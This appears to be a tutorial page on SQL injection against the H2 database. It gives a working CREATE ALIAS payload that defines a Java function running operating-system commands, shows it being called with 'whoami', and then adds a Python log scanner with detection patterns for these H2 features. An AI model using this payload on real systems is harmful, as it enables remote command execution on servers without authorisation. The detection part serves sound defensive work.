H2 Database Exploit: ALIAS SQL Injection (Java)

The H2 engine provides several built-in functions and commands for interacting with the database. The noteworthy ones are:

  • FILE_READ: Returns the contents of a file. (function)

  • FILE_WRITE: Writes the supplied parameter into a file. (function)

  • CSVWRITE: Writes a CSV (comma-separated values) file. (function)

  • CREATE ALIAS: Creates a new function alias. (command)

We can create an alias whose body is Java source code, and then call it from our SQL queries to exploit this scenario:

1'; CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next() : ""; }'; --

After that, you can call the alias:

1' union select 1,2,execve('whoami')-- # this should get executed
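
From the defender's side, the statements above leave recognisable traces in request logs. The following Python sketch is an added example, not part of the original page: it normalises request lines and flags the H2 features listed above. The names H2_SIGNATURES, normalize, scan_line and scan_log and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# H2 features listed on this page; none of them belongs in a request parameter.
H2_SIGNATURES = {
    "CREATE ALIAS": re.compile(r"\bCREATE\s+ALIAS\b"),
    "FILE_READ": re.compile(r"\bFILE_READ\s*\("),
    "FILE_WRITE": re.compile(r"\bFILE_WRITE\s*\("),
    "CSVWRITE": re.compile(r"\bCSVWRITE\s*\("),
}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(raw: str) -> str:
    """Undo nested URL encoding, inline SQL comments, odd spacing and case."""
    text = raw
    for _ in range(3):  # bounded, so crafted input cannot force endless decoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = SQL_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).upper()


def scan_line(line: str) -> list[str]:
    """Return the names of all signatures found in one log line."""
    text = normalize(line)
    return [name for name, rx in H2_SIGNATURES.items() if rx.search(text)]


def scan_log(lines):
    """Return (line_number, hits) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := scan_line(line))]


# Constructed access-log request lines (hypothetical, not from a real system).
SAMPLE_LOG = [
    "GET /item?id=1 HTTP/1.1",
    "GET /item?id=1'%3B%20CREATE%20ALIAS%20EXECVE%20AS%20... HTTP/1.1",
    "GET /item?id=1%2527%253B%2520create%252F**%252Falias%2520X HTTP/1.1",
    "GET /item?id=1%27+union+select+1,2,file_read(%27x%27)-- HTTP/1.1",
    "GET /search?q=how+to+create+an+alias HTTP/1.1",  # benign; must not match
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(n, hits)
```

Signature matching of this kind is a detection aid only; the injection itself is closed by binding user input as query parameters instead of concatenating it into the SQL string.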
